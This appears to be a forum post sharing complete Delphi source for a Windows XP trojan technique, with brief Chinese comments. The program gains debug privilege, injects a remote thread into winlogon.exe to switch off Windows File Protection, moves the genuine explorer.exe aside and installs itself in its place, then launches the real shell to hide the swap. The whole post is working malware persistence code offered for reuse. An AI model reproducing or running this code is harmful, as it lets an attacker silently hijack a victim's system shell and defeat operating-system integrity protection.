导读:
在偶的VPC上测试是可以的。没有更多的测试.
偶并没有调用dllcache目录下的.你喜欢吧
- {*******************************************************}
- { }
- { 关闭XP保护。替换explorer.exe }
- { }
- { 版权所有 (C) 2008 }
- { }
- {*******************************************************}
- program Project1;
- uses
- Windows,TlHelp32;
- function LowerCase(const S: string): string; //转小写
- var
- Ch: Char;
- L: Integer;
- Source, Dest: PChar;
- begin
- L := Length(S);
- SetLength(Result, L);
- Source := Pointer(S);
- Dest := Pointer(Result);
- while L <>0 do
- begin
- Ch := Source^;
- if (Ch >= 'A') and (Ch <= 'Z') then Inc(Ch, 32);
- Dest^ := Ch;
- Inc(Source);
- Inc(Dest);
- Dec(L);
- end;
- end;
- function CreatedMutexEx(MutexName: Pchar): Boolean;
- var
- MutexHandle: dword;
- begin
- MutexHandle := CreateMutex(nil, True, MutexName);
- if MutexHandle <>0 then
- begin
- if GetLastError = ERROR_ALREADY_EXISTS then
- begin
- //CloseHandle(MutexHandle);
- Result := False;
- Exit;
- end;
- end;
- Result := True;
- end;
- function GetWinPath: string; //取WINDOWS目录
- var
- Buf: array[0..MAX_PATH] of char;
- begin
- GetWindowsDirectory(Buf, MAX_PATH);
- Result := Buf;
- if Result[Length(Result)]<>'\' then Result := Result + '\';
- end;
- function GetTempDirectory: string; //取临时目录
- var
- Buf: array[0..MAX_PATH] of char;
- begin
- GetTempPath(MAX_PATH,Buf);
- Result := Buf;
- if Result[Length(Result)]<>'\' then Result := Result + '\';
- end;
- function EnableDebugPriv : Boolean; //提权为DEBUG
- var
- hToken : THANDLE;
- tp : TTokenPrivileges;
- rl : Cardinal;
- begin
- result := false;
- OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY, hToken);
- if LookupPrivilegeValue(nil, 'SeDebugPrivilege', tp.Privileges[0].Luid) then
- begin
- tp.PrivilegeCount := 1;
- tp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
- result := AdjustTokenPrivileges(hToken, False, tp, sizeof(tp), nil, rl);
- end;
- end;
- procedure InjectThread(ProcessHandle: DWORD); //注入winlogon.exe 关闭XP文件保护
- var
- TID: LongWord;
- hSfc,hThread: HMODULE;
- pfnCloseEvents: Pointer;
- begin
- hSfc := LoadLibrary('sfc_os.dll');
- pfnCloseEvents := GetProcAddress(hSfc,MAKEINTRESOURCE(2));
- FreeLibrary(hSfc);
- hThread := CreateRemoteThread(ProcessHandle, nil, 0, pfnCloseEvents, nil, 0, TID);
- WaitForSingleObject(hThread, 4000);
- end;
- procedure InitProcess(Name: string); //查找winlogon.exe进程PID
- var
- FSnapshotHandle: THandle;
- FProcessEntry32: TProcessEntry32;
- ProcessHandle:dword;
- begin
- FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
- FProcessEntry32.dwSize:=Sizeof(FProcessEntry32);
- if Process32First(FSnapshotHandle,FProcessEntry32) then begin
- repeat
- If Name = LowerCase(FProcessEntry32.szExeFile) then
- begin
- ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, FProcessEntry32.th32ProcessID);
- InjectThread(ProcessHandle);
- CloseHandle(ProcessHandle);
- Break;
- end;
- until not Process32Next(FSnapshotHandle,FProcessEntry32);
- end;
- CloseHandle(FSnapshotHandle);
- end;
- const ExpFile = 'explorer.exe';
- MasterMutex = 'OpenSoul';
- var
- s: string;
- begin
- if not CreatedMutexEx(MasterMutex) then ExitProcess(0); //互拆体
- if not EnableDebugPriv then Exit; //提权失败退出
- InitProcess('winlogon.exe') ;//注入winlogon.exe 先关闭xp的文件保护 .预防系统的还原
- s := ParamStr(0) ;//取本名
- if LowerCase(s) <>LowerCase(GetWinPath + ExpFile) then //判断自己是不是系统下的explorer.exe
- begin //如果不是
- MoveFileEx(PChar(GetWinPath + ExpFile),PChar(GetWinPath + 'system32\explorer.exe'),MOVEFILE_REPLACE_EXISTING); //先移动正在运行的explorer.exe
- CopyFile(PChar(S),PChar(GetWinPath+ ExpFile),false) ;//把自己复制到windows目录 为explorer.exe
- end;
- WinExec(PChar(GetWinPath + 'system32\explorer.exe'),1); //运行真正的explorer.exe
- end.
